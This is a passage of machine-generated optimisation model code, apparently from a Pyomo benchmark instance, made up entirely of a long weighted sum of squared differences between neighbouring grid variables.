*m.x668 - 8.11690209768664*m.x695)**2 + (1.3*m.x694 - 1.3*m.x695)**2) + 2.92521271535938*((
8.11690209768664*m.x669 - 8.11690209768664*m.x696)**2 + (1.3*m.x695 - 1.3*m.x696)**2) +
2.92521271535938*((8.11690209768664*m.x670 - 8.11690209768664*m.x697)**2 + (1.3*m.x696 - 1.3*
m.x697)**2) + 2.92521271535938*((8.11690209768664*m.x671 - 8.11690209768664*m.x698)**2 + (1.3*
m.x697 - 1.3*m.x698)**2) + 2.92521271535938*((8.11690209768664*m.x672 - 8.11690209768664*m.x699)
**2 + (1.3*m.x698 - 1.3*m.x699)**2) + 2.92521271535938*((8.11690209768664*m.x673 -
8.11690209768664*m.x700)**2 + (1.3*m.x699 - 1.3*m.x700)**2) + 2.92521271535938*((8.11690209768664
*m.x674 - 8.11690209768664*m.x701)**2 + (1.3*m.x700 - 1.3*m.x701)**2) + 2.92521271535938*((
8.11690209768664*m.x675 - 8.11690209768664*m.x702)**2 + (1.3*m.x701 - 1.3*m.x702)**2) +
2.91784395300997*((8.11690209768664*m.x677 - 8.11690209768664*m.x704)**2 + (1.3*m.x703 - 1.3*
m.x704)**2) + 2.91784395300997*((8.11690209768664*m.x678 - 8.11690209768664*m.x705)**2 + (1.3*
m.x704 - 1.3*m.x705)**2) + 2.91784395300997*((8.11690209768664*m.x679 - 8.11690209768664*m.x706)
**2 + (1.3*m.x705 - 1.3*m.x706)**2) + 2.91784395300997*((8.11690209768664*m.x680 -
8.11690209768664*m.x707)**2 + (1.3*m.x706 - 1.3*m.x707)**2) + 2.91784395300997*((8.11690209768664
*m.x681 - 8.11690209768664*m.x708)**2 + (1.3*m.x707 - 1.3*m.x708)**2) + 2.91784395300997*((
8.11690209768664*m.x682 - 8.11690209768664*m.x709)**2 + (1.3*m.x708 - 1.3*m.x709)**2) +
2.91784395300997*((8.11690209768664*m.x683 - 8.11690209768664*m.x710)**2 + (1.3*m.x709 - 1.3*
m.x710)**2) + 2.91784395300997*((8.11690209768664*m.x684 - 8.11690209768664*m.x711)**2 + (1.3*
m.x710 - 1.3*m.x711)**2) + 2.91784395300997*((8.11690209768664*m.x685 - 8.11690209768664*m.x712)
**2 + (1.3*m.x711 - 1.3*m.x712)**2) + 2.91784395300997*((8.11690209768664*m.x686 -
8.11690209768664*m.x713)**2 + (1.3*m.x712 - 1.3*m.x713)**2) + 2.91784395300997*((8.11690209768664
*m.x687 - 8.11690209768664*m.x714)**2 + (1.3*m.x713 - 1.3*m.x714)**2) + 2.91784395300997*((
8.11690209768664*m.x688 - 8.11690209768664*m.x715)**2 + (1.3*m.x714 - 1.3*m.x715)**2) +
2.91784395300997*((8.11690209768664*m.x689 - 8.11690209768664*m.x716)**2 + (1.3*m.x715 - 1.3*
m.x716)**2) + 2.91784395300997*((8.11690209768664*m.x690 - 8.11690209768664*m.x717)**2 + (1.3*
m.x716 - 1.3*m.x717)**2) + 2.91784395300997*((8.11690209768664*m.x691 - 8.11690209768664*m.x718)
**2 + (1.3*m.x717 - 1.3*m.x718)**2) + 2.91784395300997*((8.11690209768664*m.x692 -
8.11690209768664*m.x719)**2 + (1.3*m.x718 - 1.3*m.x719)**2) + 2.91784395300997*((8.11690209768664
*m.x693 - 8.11690209768664*m.x720)**2 + (1.3*m.x719 - 1.3*m.x720)**2) + 2.91784395300997*((
8.11690209768664*m.x694 - 8.11690209768664*m.x721)**2 + (1.3*m.x720 - 1.3*m.x721)**2) +
2.91784395300997*((8.11690209768664*m.x695 - 8.11690209768664*m.x722)**2 + (1.3*m.x721 - 1.3*
m.x722)**2) + 2.91784395300997*((8.11690209768664*m.x696 - 8.11690209768664*m.x723)**2 + (1.3*
m.x722 - 1.3*m.x723)**2) + 2.91784395300997*((8.11690209768664*m.x697 - 8.11690209768664*m.x724)
**2 + (1.3*m.x723 - 1.3*m.x724)**2) + 2.91784395300997*((8.11690209768664*m.x698 -
8.11690209768664*m.x725)**2 + (1.3*m.x724 - 1.3*m.x725)**2) + 2.91784395300997*((8.11690209768664
*m.x699 - 8.11690209768664*m.x726)**2 + (1.3*m.x725 - 1.3*m.x726)**2) + 2.91784395300997*((
8.11690209768664*m.x700 - 8.11690209768664*m.x727)**2 + (1.3*m.x726 - 1.3*m.x727)**2) +
2.91784395300997*((8.11690209768664*m.x701 - 8.11690209768664*m.x728)**2 + (1.3*m.x727 - 1.3*
m.x728)**2) + 2.91784395300997*((8.11690209768664*m.x702 - 8.11690209768664*m.x729)**2 + (1.3*
m.x728 - 1.3*m.x729)**2) + 2.92521271535938*((8.11690209768664*m.x704 - 8.11690209768664*m.x731)
**2 + (1.3*m.x730 - 1.3*m.x731)**2) + 2.92521271535938*((8.11690209768664*m.x705 -
8.11690209768664*m.x732)**2 + (1.3*m.x731 - 1.3*m.x732)**2) + 2.92521271535938*((8.11690209768664
*m.x706 - 8.11690209768664*m.x733)**2 + (1.3*m.x732 - 1.3*m.x733)**2) + 2.92521271535938*((
8.11690209768664*m.x707 - 8.11690209768664*m.x734)**2 + (1.3*m.x733 - 1.3*m.x734)**2) +
2.92521271535938*((8.11690209768664*m.x708 - 8.11690209768664*m.x735)**2 + (1.3*m.x734 - 1.3*
m.x735)**2) + 2.92521271535938*((8.11690209768664*m.x709 - 8.11690209768664*m.x736)**2 + (1.3*
m.x735 - 1.3*m.x736)**2) + 2.92521271535938*((8.11690209768664*m.x710 - 8.11690209768664*m.x737)
**2 + (1.3*m.x736 - 1.3*m.x737)**2) + 2.92521271535938*((8.11690209768664*m.x711 -
8.11690209768664*m.x738)**2 + (1.3*m.x737 - 1.3*m.x738)**2) + 2.92521271535938*((8.11690209768664
*m.x712 - 8.11690209768664*m.x739)**2 + (1.3*m.x738 - 1.3*m.x739)**2) + 2.92521271535938*((
8.11690209768664*m.x713 - 8.11690209768664*m.x740)**2 + (1.3*m.x739 - 1.3*m.x740)**2) +
2.92521271535938*((8.11690209768664*m.x714 - 8.11690209768664*m.x741)**2 + (1.3*m.x740 - 1.3*
m.x741)**2) + 2.92521271535938*((8.11690209768664*m.x715 - 8.11690209768664*m.x742)**2 + (1.3*
m.x741 - 1.3*m.x742)**2) + 2.92521271535938*((8.11690209768664*m.x716 - 8.11690209768664*m.x743)
**2 + (1.3*m.x742 - 1.3*m.x743)**2) + 2.92521271535938*((8.11690209768664*m.x717 -
8.11690209768664*m.x744)**2 + (1.3*m.x743 - 1.3*m.x744)**2) + 2.92521271535938*((8.11690209768664
*m.x718 - 8.11690209768664*m.x745)**2 + (1.3*m.x744 - 1.3*m.x745)**2) + 2.92521271535938*((
8.11690209768664*m.x719 - 8.11690209768664*m.x746)**2 + (1.3*m.x745 - 1.3*m.x746)**2) +
2.92521271535938*((8.11690209768664*m.x720 - 8.11690209768664*m.x747)**2 + (1.3*m.x746 - 1.3*
m.x747)**2) + 2.92521271535938*((8.11690209768664*m.x721 - 8.11690209768664*m.x748)**2 + (1.3*
m.x747 - 1.3*m.x748)**2) + 2.92521271535938*((8.11690209768664*m.x722 - 8.11690209768664*m.x749)
**2 + (1.3*m.x748 - 1.3*m.x749)**2) + 2.92521271535938*((8.11690209768664*m.x723 -
8.11690209768664*m.x750)**2 + (1.3*m.x749 - 1.3*m.x750)**2) + 2.92521271535938*((8.11690209768664
*m.x724 - 8.11690209768664*m.x751)**2 + (1.3*m.x750 - 1.3*m.x751)**2) + 2.92521271535938*((
8.11690209768664*m.x725 - 8.11690209768664*m.x752)**2 + (1.3*m.x751 - 1.3*m.x752)**2) +
2.92521271535938*((8.11690209768664*m.x726 - 8.11690209768664*m.x753)**2 + (1.3*m.x752 - 1.3*
m.x753)**2) + 2.92521271535938*((8.11690209768664*m.x727 - 8.11690209768664*m.x754)**2 + (1.3*
m.x753 - 1.3*m.x754)**2) + 2.92521271535938*((8.11690209768664*m.x728 - 8.11690209768664*m.x755)
**2 + (1.3*m.x754 - 1.3*m.x755)**2) + 2.92521271535938*((8.11690209768664*m.x729 -
8.11690209768664*m.x756)**2 + (1.3*m.x755 - 1.3*m.x756)**2) + 2.94728071564996*((8.11690209768664
*m.x731 - 8.11690209768664*m.x758)**2 + (1.3*m.x757 - 1.3*m.x758)**2) + 2.94728071564996*((
8.11690209768664*m.x732 - 8.11690209768664*m.x759)**2 + (1.3*m.x758 - 1.3*m.x759)**2) +
2.94728071564996*((8.11690209768664*m.x733 - 8.11690209768664*m.x760)**2 + (1.3*m.x759 - 1.3*
m.x760)**2) + 2.94728071564996*((8.11690209768664*m.x734 - 8.11690209768664*m.x761)**2 + (1.3*
m.x760 - 1.3*m.x761)**2) + 2.94728071564996*((8.11690209768664*m.x735 - 8.11690209768664*m.x762)
**2 + (1.3*m.x761 - 1.3*m.x762)**2) + 2.94728071564996*((8.11690209768664*m.x736 -
8.11690209768664*m.x763)**2 + (1.3*m.x762 - 1.3*m.x763)**2) + 2.94728071564996*((8.11690209768664
*m.x737 - 8.11690209768664*m.x764)**2 + (1.3*m.x763 - 1.3*m.x764)**2) + 2.94728071564996*((
8.11690209768664*m.x738 - 8.11690209768664*m.x765)**2 + (1.3*m.x764 - 1.3*m.x765)**2) +
2.94728071564996*((8.11690209768664*m.x739 - 8.11690209768664*m.x766)**2 + (1.3*m.x765 - 1.3*
m.x766)**2) + 2.94728071564996*((8.11690209768664*m.x740 - 8.11690209768664*m.x767)**2 + (1.3*
m.x766 - 1.3*m.x767)**2) + 2.94728071564996*((8.11690209768664*m.x741 - 8.11690209768664*m.x768)
**2 + (1.3*m.x767 - 1.3*m.x768)**2) + 2.94728071564996*((8.11690209768664*m.x742 -
8.11690209768664*m.x769)**2 + (1.3*m.x768 - 1.3*m.x769)**2) + 2.94728071564996*((8.11690209768664
*m.x743 - 8.11690209768664*m.x770)**2 + (1.3*m.x769 - 1.3*m.x770)**2) + 2.94728071564996*((
8.11690209768664*m.x744 - 8.11690209768664*m.x771)**2 + (1.3*m.x770 - 1.3*m.x771)**2) +
2.94728071564996*((8.11690209768664*m.x745 - 8.11690209768664*m.x772)**2 + (1.3*m.x771 - 1.3*
m.x772)**2) + 2.94728071564996*((8.11690209768664*m.x746 - 8.11690209768664*m.x773)**2 + (1.3*
m.x772 - 1.3*m.x773)**2) + 2.94728071564996*((8.11690209768664*m.x747 - 8.11690209768664*m.x774)
**2 + (1.3*m.x773 - 1.3*m.x774)**2) + 2.94728071564996*((8.11690209768664*m.x748 -
8.11690209768664*m.x775)**2 + (1.3*m.x774 - 1.3*m.x775)**2) + 2.94728071564996*((8.11690209768664
*m.x749 - 8.11690209768664*m.x776)**2 + (1.3*m.x775 - 1.3*m.x776)**2) + 2.94728071564996*((
8.11690209768664*m.x750 - 8.11690209768664*m.x777)**2 + (1.3*m.x776 - 1.3*m.x777)**2) +
2.94728071564996*((8.11690209768664*m.x751 - 8.11690209768664*m.x778)**2 + (1.3*m.x777 - 1.3*
m.x778)**2) + 2.94728071564996*((8.11690209768664*m.x752 - 8.11690209768664*m.x779)**2 + (1.3*
m.x778 - 1.3*m.x779)**2) + 2.94728071564996*((8.11690209768664*m.x753 - 8.11690209768664*m.x780)
**2 + (1.3*m.x779 - 1.3*m.x780)**2) + 2.94728071564996*((8.11690209768664*m.x754 -
8.11690209768664*m.x781)**2 + (1.3*m.x780 - 1.3*m.x781)**2) + 2.94728071564996*((8.11690209768664
*m.x755 - 8.11690209768664*m.x782)**2 + (1.3*m.x781 - 1.3*m.x782)**2) + 2.94728071564996*((
8.11690209768664*m.x756 - 8.11690209768664*m.x783)**2 + (1.3*m.x782 - 1.3*m.x783)**2) +
2.98392983330721*((8.11690209768664*m.x758 - 8.11690209768664*m.x785)**2 + (1.3*m.x784 - 1.3*
m.x785)**2) + 2.98392983330721*((8.11690209768664*m.x759 - 8.11690209768664*m.x786)**2 + (1.3*
m.x785 - 1.3*m.x786)**2) + 2.98392983330721*((8.11690209768664*m.x760 - 8.11690209768664*m.x787)
**2 + (1.3*m.x786 - 1.3*m.x787)**2) + 2.98392983330721*((8.11690209768664*m.x761 -
8.11690209768664*m.x788)**2 + (1.3*m.x787 - 1.3*m.x788)**2) + 2.98392983330721*((8.11690209768664
*m.x762 - 8.11690209768664*m.x789)**2 + (1.3*m.x788 - 1.3*m.x789)**2) + 2.98392983330721*((
8.11690209768664*m.x763 - 8.11690209768664*m.x790)**2 + (1.3*m.x789 - 1.3*m.x790)**2) +
2.98392983330721*((8.11690209768664*m.x764 - 8.11690209768664*m.x791)**2 + (1.3*m.x790 - 1.3*
m.x791)**2) + 2.98392983330721*((8.11690209768664*m.x765 - 8.11690209768664*m.x792)**2 + (1.3*
m.x791 - 1.3*m.x792)**2) + 2.98392983330721*((8.11690209768664*m.x766 - 8.11690209768664*m.x793)
**2 + (1.3*m.x792 - 1.3*m.x793)**2) + 2.98392983330721*((8.11690209768664*m.x767 -
8.11690209768664*m.x794)**2 + (1.3*m.x793 - 1.3*m.x794)**2) + 2.98392983330721*((8.11690209768664
*m.x768 - 8.11690209768664*m.x795)**2 + (1.3*m.x794 - 1.3*m.x795)**2) + 2.98392983330721*((
8.11690209768664*m.x769 - 8.11690209768664*m.x796)**2 + (1.3*m.x795 - 1.3*m.x796)**2) +
2.98392983330721*((8.11690209768664*m.x770 - 8.11690209768664*m.x797)**2 + (1.3*m.x796 - 1.3*
m.x797)**2) + 2.98392983330721*((8.11690209768664*m.x771 - 8.11690209768664*m.x798)**2 + (1.3*
m.x797 - 1.3*m.x798)**2) + 2.98392983330721*((8.11690209768664*m.x772 - 8.11690209768664*m.x799)
**2 + (1.3*m.x798 - 1.3*m.x799)**2) + 2.98392983330721*((8.11690209768664*m.x773 -
8.11690209768664*m.x800)**2 + (1.3*m.x799 - 1.3*m.x800)**2) + 2.98392983330721*((8.11690209768664
*m.x774 - 8.11690209768664*m.x801)**2 + (1.3*m.x800 - 1.3*m.x801)**2) + 2.98392983330721*((
8.11690209768664*m.x775 - 8.11690209768664*m.x802)**2 + (1.3*m.x801 - 1.3*m.x802)**2) +
2.98392983330721*((8.11690209768664*m.x776 - 8.11690209768664*m.x803)**2 + (1.3*m.x802 - 1.3*
m.x803)**2) + 2.98392983330721*((8.11690209768664*m.x777 - 8.11690209768664*m.x804)**2 + (1.3*
m.x803 - 1.3*m.x804)**2) + 2.98392983330721*((8.11690209768664*m.x778 - 8.11690209768664*m.x805)
**2 + (1.3*m.x804 - 1.3*m.x805)**2) + 2.98392983330721*((8.11690209768664*m.x779 -
8.11690209768664*m.x806)**2 + (1.3*m.x805 - 1.3*m.x806)**2) + 2.98392983330721*((8.11690209768664
*m.x780 - 8.11690209768664*m.x807)**2 + (1.3*m.x806 - 1.3*m.x807)**2) + 2.98392983330721*((
8.11690209768664*m.x781 - 8.11690209768664*m.x808)**2 + (1.3*m.x807 - 1.3*m.x808)**2) +
2.98392983330721*((8.11690209768664*m.x782 - 8.11690209768664*m.x809)**2 + (1.3*m.x808 - 1.3*
m.x809)**2) + 2.98392983330721*((8.11690209768664*m.x783 - 8.11690209768664*m.x810)**2 + (1.3*
m.x809 - 1.3*m.x810)**2) + 3.03495253422332*((8.11690209768664*m.x785 - 8.11690209768664*m.x812)
**2 + (1.3*m.x811 - 1.3*m.x812)**2) + 3.03495253422332*((8.11690209768664*m.x786 -
8.11690209768664*m.x813)**2 + (1.3*m.x812 - 1.3*m.x813)**2) + 3.03495253422332*((8.11690209768664
*m.x787 - 8.11690209768664*m.x814)**2 + (1.3*m.x813 - 1.3*m.x814)**2) + 3.03495253422332*((
8.11690209768664*m.x788 - 8.11690209768664*m.x815)**2 + (1.3*m.x814 - 1.3*m.x815)**2) +
3.03495253422332*((8.11690209768664*m.x789 - 8.11690209768664*m.x816)**2 + (1.3*m.x815 - 1.3*
m.x816)**2) + 3.03495253422332*((8.11690209768664*m.x790 - 8.11690209768664*m.x817)**2 + (1.3*
m.x816 - 1.3*m.x817)**2) + 3.03495253422332*((8.11690209768664*m.x791 - 8.11690209768664*m.x818)
**2 + (1.3*m.x817 - 1.3*m.x818)**2) + 3.03495253422332*((8.11690209768664*m.x792 -
8.11690209768664*m.x819)**2 + (1.3*m.x818 - 1.3*m.x819)**2) + 3.03495253422332*((8.11690209768664
*m.x793 - 8.11690209768664*m.x820)**2 + (1.3*m.x819 - 1.3*m.x820)**2) + 3.03495253422332*((
8.11690209768664*m.x794 - 8.11690209768664*m.x821)**2 + (1.3*m.x820 - 1.3*m.x821)**2) +
3.03495253422332*((8.11690209768664*m.x795 - 8.11690209768664*m.x822)**2 + (1.3*m.x821 - 1.3*
m.x822)**2) + 3.03495253422332*((8.11690209768664*m.x796 - 8.11690209768664*m.x823)**2 + (1.3*
m.x822 - 1.3*m.x823)**2) + 3.03495253422332*((8.11690209768664*m.x797 - 8.11690209768664*m.x824)
**2 + (1.3*m.x823 - 1.3*m.x824)**2) + 3.03495253422332*((8.11690209768664*m.x798 -
8.11690209768664*m.x825)**2 + (1.3*m.x824 - 1.3*m.x825)**2) + 3.03495253422332*((8.11690209768664
*m.x799 - 8.11690209768664*m.x826)**2 + (1.3*m.x825 - 1.3*m.x826)**2) + 3.03495253422332*((
8.11690209768664*m.x800 - 8.11690209768664*m.x827)**2 + (1.3*m.x826 - 1.3*m.x827)**2) +
3.03495253422332*((8.11690209768664*m.x801 - 8.11690209768664*m.x828)**2 + (1.3*m.x827 - 1.3*
m.x828)**2) + 3.03495253422332*((8.11690209768664*m.x802 - 8.11690209768664*m.x829)**2 + (1.3*
m.x828 - 1.3*m.x829)**2) + 3.03495253422332*((8.11690209768664*m.x803 - 8.11690209768664*m.x830)
**2 + (1.3*m.x829 - 1.3*m.x830)**2) + 3.03495253422332*((8.11690209768664*m.x804 -
8.11690209768664*m.x831)**2 + (1.3*m.x830 - 1.3*m.x831)**2) + 3.03495253422332*((8.11690209768664
*m.x805 - 8.11690209768664*m.x832)**2 + (1.3*m.x831 - 1.3*m.x832)**2) + 3.03495253422332*((
8.11690209768664*m.x806 - 8.11690209768664*m.x833)**2 + (1.3*m.x832 - 1.3*m.x833)**2) +
3.03495253422332*((8.11690209768664*m.x807 - 8.11690209768664*m.x834)**2 + (1.3*m.x833 - 1.3*
m.x834)**2) + 3.03495253422332*((8.11690209768664*m.x808 - 8.11690209768664*m.x835)**2 + (1.3*
m.x834 - 1.3*m.x835)**2) + 3.03495253422332*((8.11690209768664*m.x809 - 8.11690209768664*m.x836)
**2 + (1.3*m.x835 - 1.3*m.x836)**2) + 3.03495253422332*((8.11690209768664*m.x810 -
8.11690209768664*m.x837)**2 + (1.3*m.x836 - 1.3*m.x837)**2) + 3.10003657380856*((8.11690209768664
*m.x812 - 8.11690209768664*m.x839)**2 + (1.3*m.x838 - 1.3*m.x839)**2) + 3.10003657380856*((
8.11690209768664*m.x813 - 8.11690209768664*m.x840)**2 + (1.3*m.x839 - 1.3*m.x840)**2) +
3.10003657380856*((8.11690209768664*m.x814 - 8.11690209768664*m.x841)**2 + (1.3*m.x840 - 1.3*
m.x841)**2) + 3.10003657380856*((8.11690209768664*m.x815 - 8.11690209768664*m.x842)**2 + (1.3*
m.x841 - 1.3*m.x842)**2) + 3.10003657380856*((8.11690209768664*m.x816 - 8.11690209768664*m.x843)
**2 + (1.3*m.x842 - 1.3*m.x843)**2) + 3.10003657380856*((8.11690209768664*m.x817 -
8.11690209768664*m.x844)**2 + (1.3*m.x843 - 1.3*m.x844)**2) + 3.10003657380856*((8.11690209768664
*m.x818 - 8.11690209768664*m.x845)**2 + (1.3*m.x844 - 1.3*m.x845)**2) + 3.10003657380856*((
8.11690209768664*m.x819 - 8.11690209768664*m.x846)**2 + (1.3*m.x845 - 1.3*m.x846)**2) +
3.10003657380856*((8.11690209768664*m.x820 - 8.11690209768664*m.x847)**2 + (1.3*m.x846 - 1.3*
m.x847)**2) + 3.10003657380856*((8.11690209768664*m.x821 - 8.11690209768664*m.x848)**2 + (1.3*
m.x847 - 1.3*m.x848)**2) + 3.10003657380856*((8.11690209768664*m.x822 - 8.11690209768664*m.x849)
**2 + (1.3*m.x848 - 1.3*m.x849)**2) + 3.10003657380856*((8.11690209768664*m.x823 -
8.11690209768664*m.x850)**2 + (1.3*m.x849 - 1.3*m.x850)**2) + 3.10003657380856*((8.11690209768664
*m.x824 - 8.11690209768664*m.x851)**2 + (1.3*m.x850 - 1.3*m.x851)**2) + 3.10003657380856*((
8.11690209768664*m.x825 - 8.11690209768664*m.x852)**2 + (1.3*m.x851 - 1.3*m.x852)**2) +
3.10003657380856*((8.11690209768664*m.x826 - 8.11690209768664*m.x853)**2 + (1.3*m.x852 - 1.3*
m.x853)**2) + 3.10003657380856*((8.11690209768664*m.x827 - 8.11690209768664*m.x854)**2 + (1.3*
m.x853 - 1.3*m.x854)**2) + 3.10003657380856*((8.11690209768664*m.x828 - 8.11690209768664*m.x855)
**2 + (1.3*m.x854 - 1.3*m.x855)**2) + 3.10003657380856*((8.11690209768664*m.x829 -
8.11690209768664*m.x856)**2 + (1.3*m.x855 - 1.3*m.x856)**2) + 3.10003657380856*((8.11690209768664
*m.x830 - 8.11690209768664*m.x857)**2 + (1.3*m.x856 - 1.3*m.x857)**2) + 3.10003657380856*((
8.11690209768664*m.x831 - 8.11690209768664*m.x858)**2 + (1.3*m.x857 - 1.3*m.x858)**2) +
3.10003657380856*((8.11690209768664*m.x832 - 8.11690209768664*m.x859)**2 + (1.3*m.x858 - 1.3*
m.x859)**2) + 3.10003657380856*((8.11690209768664*m.x833 - 8.11690209768664*m.x860)**2 + (1.3*
m.x859 - 1.3*m.x860)**2) + 3.10003657380856*((8.11690209768664*m.x834 - 8.11690209768664*m.x861)
**2 + (1.3*m.x860 - 1.3*m.x861)**2) + 3.10003657380856*((8.11690209768664*m.x835 -
8.11690209768664*m.x862)**2 + (1.3*m.x861 - 1.3*m.x862)**2) + 3.10003657380856*((8.11690209768664
*m.x836 - 8.11690209768664*m.x863)**2 + (1.3*m.x862 - 1.3*m.x863)**2) + 3.10003657380856*((
8.11690209768664*m.x837 - 8.11690209768664*m.x864)**2 + (1.3*m.x863 - 1.3*m.x864)**2) +
3.17874498030212*((8.11690209768664*m.x839 - 8.11690209768664*m.x866)**2 + (1.3*m.x865 - 1.3*
m.x866)**2) + 3.17874498030212*((8.11690209768664*m.x840 - 8.11690209768664*m.x867)**2 + (1.3*
m.x866 - 1.3*m.x867)**2) + 3.17874498030212*((8.11690209768664*m.x841 - 8.11690209768664*m.x868)
**2 + (1.3*m.x867 - 1.3*m.x868)**2) + 3.17874498030212*((8.11690209768664*m.x842 -
8.11690209768664*m.x869)**2 + (1.3*m.x868 - 1.3*m.x869)**2) + 3.17874498030212*((8.11690209768664
*m.x843 - 8.11690209768664*m.x870)**2 + (1.3*m.x869 - 1.3*m.x870)**2) + 3.17874498030212*((
8.11690209768664*m.x844 - 8.11690209768664*m.x871)**2 + (1.3*m.x870 - 1.3*m.x871)**2) +
3.17874498030212*((8.11690209768664*m.x845 - 8.11690209768664*m.x872)**2 + (1.3*m.x871 - 1.3*
m.x872)**2) + 3.17874498030212*((8.11690209768664*m.x846 - 8.11690209768664*m.x873)**2 + (1.3*
m.x872 - 1.3*m.x873)**2) + 3.17874498030212*((8.11690209768664*m.x847 - 8.11690209768664*m.x874)
**2 + (1.3*m.x873 - 1.3*m.x874)**2) + 3.17874498030212*((8.11690209768664*m.x848 -
8.11690209768664*m.x875)**2 + (1.3*m.x874 - 1.3*m.x875)**2) + 3.17874498030212*((8.11690209768664
*m.x849 - 8.11690209768664*m.x876)**2 + (1.3*m.x875 - 1.3*m.x876)**2) + 3.17874498030212*((
8.11690209768664*m.x850 - 8.11690209768664*m.x877)**2 + (1.3*m.x876 - 1.3*m.x877)**2) +
3.17874498030212*((8.11690209768664*m.x851 - 8.11690209768664*m.x878)**2 + (1.3*m.x877 - 1.3*
m.x878)**2) + 3.17874498030212*((8.11690209768664*m.x852 - 8.11690209768664*m.x879)**2 + (1.3*
m.x878 - 1.3*m.x879)**2) + 3.17874498030212*((8.11690209768664*m.x853 - 8.11690209768664*m.x880)
**2 + (1.3*m.x879 - 1.3*m.x880)**2) + 3.17874498030212*((8.11690209768664*m.x854 -
8.11690209768664*m.x881)**2 + (1.3*m.x880 - 1.3*m.x881)**2) + 3.17874498030212*((8.11690209768664
*m.x855 - 8.11690209768664*m.x882)**2 + (1.3*m.x881 - 1.3*m.x882)**2) + 3.17874498030212*((
8.11690209768664*m.x856 - 8.11690209768664*m.x883)**2 + (1.3*m.x882 - 1.3*m.x883)**2) +
3.17874498030212*((8.11690209768664*m.x857 - 8.11690209768664*m.x884)**2 + (1.3*m.x883 - 1.3*
m.x884)**2) + 3.17874498030212*((8.11690209768664*m.x858 - 8.11690209768664*m.x885)**2 + (1.3*
m.x884 - 1.3*m.x885)**2) + 3.17874498030212*((8.11690209768664*m.x859 - 8.11690209768664*m.x886)
**2 + (1.3*m.x885 - 1.3*m.x886)**2) + 3.17874498030212*((8.11690209768664*m.x860 -
8.11690209768664*m.x887)**2 + (1.3*m.x886 - 1.3*m.x887)**2) + 3.17874498030212*((8.11690209768664
*m.x861 - 8.11690209768664*m.x888)**2 + (1.3*m.x887 - 1.3*m.x888)**2) + 3.17874498030212*((
8.11690209768664*m.x862 - 8.11690209768664*m.x889)**2 + (1.3*m.x888 - 1.3*m.x889)**2) +
3.17874498030212*((8.11690209768664*m.x863 - 8.11690209768664*m.x890)**2 + (1.3*m.x889 - 1.3*
m.x890)**2) + 3.17874498030212*((8.11690209768664*m.x864 - 8.11690209768664*m.x891)**2 + (1.3*
m.x890 - 1.3*m.x891)**2) + 3.27049269683565*((8.11690209768664*m.x866 - 8.11690209768664*m.x893)
**2 + (1.3*m.x892 - 1.3*m.x893)**2) + 3.27049269683565*((8.11690209768664*m.x867 -
8.11690209768664*m.x894)**2 + (1.3*m.x893 - 1.3*m.x894)**2) + 3.27049269683565*((8.11690209768664
*m.x868 - 8.11690209768664*m.x895)**2 + (1.3*m.x894 - 1.3*m.x895)**2) + 3.27049269683565*((
8.11690209768664*m.x869 - 8.11690209768664*m.x896)**2 + (1.3*m.x895 - 1.3*m.x896)**2) +
3.27049269683565*((8.11690209768664*m.x870 - 8.11690209768664*m.x897)**2 + (1.3*m.x896 - 1.3*
m.x897)**2) + 3.27049269683565*((8.11690209768664*m.x871 - 8.11690209768664*m.x898)**2 + (1.3*
m.x897 - 1.3*m.x898)**2) + 3.27049269683565*((8.11690209768664*m.x872 - 8.11690209768664*m.x899)
**2 + (1.3*m.x898 - 1.3*m.x899)**2) + 3.27049269683565*((8.11690209768664*m.x873 -
8.11690209768664*m.x900)**2 + (1.3*m.x899 - 1.3*m.x900)**2) + 3.27049269683565*((8.11690209768664
*m.x874 - 8.11690209768664*m.x901)**2 + (1.3*m.x900 - 1.3*m.x901)**2) + 3.27049269683565*((
8.11690209768664*m.x875 - 8.11690209768664*m.x902)**2 + (1.3*m.x901 - 1.3*m.x902)**2) +
3.27049269683565*((8.11690209768664*m.x876 - 8.11690209768664*m.x903)**2 + (1.3*m.x902 - 1.3*
m.x903)**2) + 3.27049269683565*((8.11690209768664*m.x877 - 8.11690209768664*m.x904)**2 + (1.3*
m.x903 - 1.3*m.x904)**2) + 3.27049269683565*((8.11690209768664*m.x878 - 8.11690209768664*m.x905)
**2 + (1.3*m.x904 - 1.3*m.x905)**2) + 3.27049269683565*((8.11690209768664*m.x879 -
8.11690209768664*m.x906)**2 + (1.3*m.x905 - 1.3*m.x906)**2) + 3.27049269683565*((8.11690209768664
*m.x880 - 8.11690209768664*m.x907)**2 + (1.3*m.x906 - 1.3*m.x907)**2) + 3.27049269683565*((
8.11690209768664*m.x881 - 8.11690209768664*m.x908)**2 + (1.3*m.x907 - 1.3*m.x908)**2) +
3.27049269683565*((8.11690209768664*m.x882 - 8.11690209768664*m.x909)**2 + (1.3*m.x908 - 1.3*
m.x909)**2) + 3.27049269683565*((8.11690209768664*m.x883 - 8.11690209768664*m.x910)**2 + (1.3*
m.x909 - 1.3*m.x910)**2) + 3.27049269683565*((8.11690209768664*m.x884 - 8.11690209768664*m.x911)
**2 + (1.3*m.x910 - 1.3*m.x911)**2) + 3.27049269683565*((8.11690209768664*m.x885 -
8.11690209768664*m.x912)**2 + (1.3*m.x911 - 1.3*m.x912)**2) + 3.27049269683565*((8.11690209768664
*m.x886 - 8.11690209768664*m.x913)**2 + (1.3*m.x912 - 1.3*m.x913)**2) + 3.27049269683565*((
8.11690209768664*m.x887 - 8.11690209768664*m.x914)**2 + (1.3*m.x913 - 1.3*m.x914)**2) +
3.27049269683565*((8.11690209768664*m.x888 - 8.11690209768664*m.x915)**2 + (1.3*m.x914 - 1.3*
m.x915)**2) + 3.27049269683565*((8.11690209768664*m.x889 - 8.11690209768664*m.x916)**2 + (1.3*
m.x915 - 1.3*m.x916)**2) + 3.27049269683565*((8.11690209768664*m.x890 - 8.11690209768664*m.x917)
**2 + (1.3*m.x916 - 1.3*m.x917)**2) + 3.27049269683565*((8.11690209768664*m.x891 -
8.11690209768664*m.x918)**2 + (1.3*m.x917 - 1.3*m.x918)**2) + 3.37452161263043*((8.11690209768664
*m.x893 - 8.11690209768664*m.x920)**2 + (1.3*m.x919 - 1.3*m.x920)**2) + 3.37452161263043*((
8.11690209768664*m.x894 - 8.11690209768664*m.x921)**2 + (1.3*m.x920 - 1.3*m.x921)**2) +
3.37452161263043*((8.11690209768664*m.x895 - 8.11690209768664*m.x922)**2 + (1.3*m.x921 - 1.3*
m.x922)**2) + 3.37452161263043*((8.11690209768664*m.x896 - 8.11690209768664*m.x923)**2 + (1.3*
m.x922 - 1.3*m.x923)**2) + 3.37452161263043*((8.11690209768664*m.x897 - 8.11690209768664*m.x924)
**2 + (1.3*m.x923 - 1.3*m.x924)**2) + 3.37452161263043*((8.11690209768664*m.x898 -
